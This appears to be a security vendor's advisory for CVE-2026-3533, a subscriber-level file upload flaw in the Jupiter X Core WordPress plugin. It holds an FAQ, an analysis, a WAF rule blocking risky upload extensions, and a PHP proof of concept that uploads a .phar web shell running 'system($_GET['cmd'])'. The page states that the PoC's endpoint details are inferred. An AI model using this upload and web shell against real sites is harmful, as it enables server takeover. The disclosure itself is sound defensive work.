How does this vulnerability work?

The vulnerability resides in the `import_popup_templates()` function, which lacks proper capability checks, allowing low-privileged users to invoke file uploads. Additionally, the `upload_files()` function does not properly validate file types, enabling the upload of malicious files that could lead to remote code execution or stored cross-site scripting.

Who is affected by CVE-2026-3533?

Authenticated users with Subscriber-level access or higher who have access to the Jupiter X Core plugin are affected. This includes any WordPress site using the vulnerable plugin version 4.14.1 or earlier.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Jupiter X Core plugin installed. If it is version 4.14.1 or earlier, your site is at risk. Additionally, review user roles to identify any authenticated users with Subscriber-level access.

What are the practical risks of this vulnerability?

The practical risks include the potential for remote code execution on servers that execute .phar files as PHP, which could lead to full server compromise. Additionally, uploading files with extensions like .svg, .dfxp, or .xhtml could result in stored cross-site scripting attacks, compromising user data and sessions.

How can I fix CVE-2026-3533?

To fix this vulnerability, update the Jupiter X Core plugin to the latest version that addresses this issue. Additionally, implement a capability check in the `import_popup_templates()` function to restrict access to authorized users and enforce strict file type validation in the `upload_files()` function.

What does a CVSS score of 8.8 indicate?

A CVSS score of 8.8 indicates a high severity level, suggesting that the vulnerability poses a significant risk to systems. This score reflects the potential impact and exploitability of the vulnerability, emphasizing the need for prompt remediation.

What is the proof of concept demonstrating?

The proof of concept (PoC) demonstrates how an attacker can exploit the vulnerability by sending an authenticated POST request to the vulnerable AJAX endpoint without proper authorization. It illustrates the process of uploading a malicious file, showcasing the lack of security checks that allow such actions.

What file types are considered dangerous in this context?

Dangerous file types in this context include .phar, .svg, .dfxp, and .xhtml. These file types can contain executable code or scripts that, when uploaded and processed by the server, can lead to severe security breaches.

How can I mitigate the risk if I cannot update immediately?

If immediate updating is not possible, consider restricting user roles and capabilities to prevent Subscribers from accessing file upload features. Additionally, implement server-side controls to block uploads of risky file types until a proper update can be applied.

What should I do if I suspect my site has been compromised?

If you suspect your site has been compromised, immediately take it offline to prevent further damage. Conduct a thorough security audit, check for unauthorized file uploads, and restore from a clean backup if necessary. Additionally, update the plugin and review user access permissions.

Where can I find more information about CVE-2026-3533?

More information about CVE-2026-3533 can be found on the National Vulnerability Database (NVD) or through security advisories published by the plugin developers. Keeping abreast of security updates and best practices for WordPress is essential for ongoing protection.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 24, 2026

CVE-2026-3533: JupiterX Core <= 4.14.1 – Authenticated (Subscriber+) Missing Authorization To Limited File Upload via Popup Template Import (jupiterx-core)

Q: What is CVE-2026-3533?

CVE-2026-3533 is a high-severity vulnerability in the Jupiter X Core plugin for WordPress, affecting versions up to and including 4.14.1. It allows authenticated users with Subscriber-level access or higher to upload potentially dangerous file types due to missing authorization checks and insufficient file type validation.

CVE ID CVE-2026-3533

Plugin jupiterx-core

Severity High (CVSS 8.8)

CWE 434

Vulnerable Version 4.14.1

Patched Version —

Disclosed March 22, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-3533 (metadata-based):
The Jupiter X Core plugin for WordPress, versions up to and including 4.14.1, contains a critical vulnerability that allows authenticated users with Subscriber-level access or higher to upload dangerous file types. This flaw resides in the `import_popup_templates()` function, which lacks proper authorization, and the `upload_files()` function, which performs insufficient file type validation.

Atomic Edge research identifies the root cause as a combination of two security failures. The first is a missing capability check on the `import_popup_templates()` function, allowing users with minimal privileges to invoke a file upload handler. The second is a failure to properly validate file extensions and MIME types within the `upload_files()` function. These conclusions are inferred from the CWE-434 classification and the vulnerability description, as the source code is not available for direct review.

An attacker exploits this vulnerability by sending an authenticated POST request to the WordPress AJAX endpoint `/wp-admin/admin-ajax.php`. The request must specify an action parameter that triggers the vulnerable `import_popup_templates()` function. A likely action value is `jupiterx_core_import_popup_templates` or a similar pattern derived from the plugin slug. The request includes a file upload parameter containing a malicious payload with a dangerous extension like `.phar`, `.svg`, `.dfxp`, or `.xhtml`. The server processes this upload without verifying the user’s right to do so or the safety of the file type.

Remediation requires two distinct code changes. Developers must implement a proper capability check, such as `current_user_can(‘edit_posts’)` or a higher privilege, within the `import_popup_templates()` function to ensure only authorized users can access it. The `upload_files()` function must be patched to implement a strict allowlist of permitted file extensions and to perform server-side MIME type verification, rejecting any file not explicitly allowed.

Successful exploitation leads to severe consequences. Attackers can achieve remote code execution on servers configured to execute `.phar` files as PHP code. Uploading `.svg`, `.dfxp`, or `.xhtml` files results in stored cross-site scripting attacks, as these file types can contain malicious scripts executed in a victim’s browser. This vulnerability grants low-privilege attackers a direct path to compromise the server or hijack user sessions.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-3533 (metadata-based)
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:63533,phase:2,deny,status:403,chain,msg:'CVE-2026-3533 via JupiterX Core AJAX file upload',severity:'CRITICAL',tag:'CVE-2026-3533',tag:'WordPress',tag:'plugin=jupiterx-core'"
  SecRule ARGS_POST:action "@streq jupiterx_core_import_popup_templates" "chain"
    SecRule FILES "@rx .(phar|svg|dfxp|xhtml)$" "t:lowercase,t:urlDecodeUni"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-3533 - JupiterX Core <= 4.14.1 - Authenticated (Subscriber+) Missing Authorization To Limited File Upload via Popup Template Import

<?php

$target_url = 'http://target-site.com/wp-admin/admin-ajax.php';
$username = 'subscriber_user';
$password = 'subscriber_pass';

// Step 1: Authenticate to WordPress to obtain cookies and a nonce.
// This PoC assumes the vulnerable endpoint does not require a nonce (missing authorization).
// If a nonce were required, it would typically be fetched from a page like the dashboard.
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url,
    'testcookie' => '1'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $login_data);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);

// Step 2: Construct the malicious file upload request.
// The exact action parameter is inferred from the plugin slug and function name.
$action = 'jupiterx_core_import_popup_templates';

// Create a temporary .phar file for RCE demonstration.
$phar_payload = "<?php echo 'Atomic Edge RCE Test'; system($_GET['cmd']); ?>n";
$temp_file = tempnam(sys_get_temp_dir(), 'exp');
$phar_file = $temp_file . '.phar';
rename($temp_file, $phar_file);
file_put_contents($phar_file, $phar_payload);

// Prepare the multipart form data for file upload.
$post_fields = array(
    'action' => $action,
    // The file parameter name is assumed; common names include 'file', 'import_file', or 'template_file'.
    'file' => new CURLFile($phar_file, 'application/octet-stream', 'exploit.phar')
);

curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
$upload_response = curl_exec($ch);

// Step 3: Check the response and attempt to access the uploaded file.
// The upload path is unknown; a successful upload might return a JSON response with a URL.
if (curl_getinfo($ch, CURLINFO_HTTP_CODE) == 200) {
    echo "Upload request completed.n";
    echo "Response: " . substr($upload_response, 0, 500) . "n";
    // An attacker would parse the response to find the uploaded file's location.
    // For this PoC, we assume a default WordPress uploads directory pattern.
    // This step is highly speculative without the actual plugin response format.
    echo "If successful, the .phar file may be accessible at a path like /wp-content/uploads/{date}/exploit.pharn";
} else {
    echo "Upload request failed with HTTP code: " . curl_getinfo($ch, CURLINFO_HTTP_CODE) . "n";
}

curl_close($ch);
unlink($phar_file);

?>

Frequently Asked Questions

What is CVE-2026-3533?
Overview of the vulnerability
CVE-2026-3533 is a high-severity vulnerability in the Jupiter X Core plugin for WordPress, affecting versions up to and including 4.14.1. It allows authenticated users with Subscriber-level access or higher to upload potentially dangerous file types due to missing authorization checks and insufficient file type validation.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability resides in the `import_popup_templates()` function, which lacks proper capability checks, allowing low-privileged users to invoke file uploads. Additionally, the `upload_files()` function does not properly validate file types, enabling the upload of malicious files that could lead to remote code execution or stored cross-site scripting.
Who is affected by CVE-2026-3533?
Identifying vulnerable users
Authenticated users with Subscriber-level access or higher who have access to the Jupiter X Core plugin are affected. This includes any WordPress site using the vulnerable plugin version 4.14.1 or earlier.
How can I check if my site is vulnerable?
Assessing your WordPress installation
To check if your site is vulnerable, verify the version of the Jupiter X Core plugin installed. If it is version 4.14.1 or earlier, your site is at risk. Additionally, review user roles to identify any authenticated users with Subscriber-level access.
What are the practical risks of this vulnerability?
Understanding the potential impact
The practical risks include the potential for remote code execution on servers that execute .phar files as PHP, which could lead to full server compromise. Additionally, uploading files with extensions like .svg, .dfxp, or .xhtml could result in stored cross-site scripting attacks, compromising user data and sessions.
How can I fix CVE-2026-3533?
Steps for remediation
To fix this vulnerability, update the Jupiter X Core plugin to the latest version that addresses this issue. Additionally, implement a capability check in the `import_popup_templates()` function to restrict access to authorized users and enforce strict file type validation in the `upload_files()` function.
What does a CVSS score of 8.8 indicate?
Severity assessment
A CVSS score of 8.8 indicates a high severity level, suggesting that the vulnerability poses a significant risk to systems. This score reflects the potential impact and exploitability of the vulnerability, emphasizing the need for prompt remediation.
What is the proof of concept demonstrating?
Understanding the PoC
The proof of concept (PoC) demonstrates how an attacker can exploit the vulnerability by sending an authenticated POST request to the vulnerable AJAX endpoint without proper authorization. It illustrates the process of uploading a malicious file, showcasing the lack of security checks that allow such actions.
What file types are considered dangerous in this context?
Identifying risky file uploads
Dangerous file types in this context include .phar, .svg, .dfxp, and .xhtml. These file types can contain executable code or scripts that, when uploaded and processed by the server, can lead to severe security breaches.
How can I mitigate the risk if I cannot update immediately?
Temporary risk management strategies
If immediate updating is not possible, consider restricting user roles and capabilities to prevent Subscribers from accessing file upload features. Additionally, implement server-side controls to block uploads of risky file types until a proper update can be applied.
What should I do if I suspect my site has been compromised?
Incident response steps
If you suspect your site has been compromised, immediately take it offline to prevent further damage. Conduct a thorough security audit, check for unauthorized file uploads, and restore from a clean backup if necessary. Additionally, update the plugin and review user access permissions.
Where can I find more information about CVE-2026-3533?
Resources for further reading
More information about CVE-2026-3533 can be found on the National Vulnerability Database (NVD) or through security advisories published by the plugin developers. Keeping abreast of security updates and best practices for WordPress is essential for ongoing protection.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations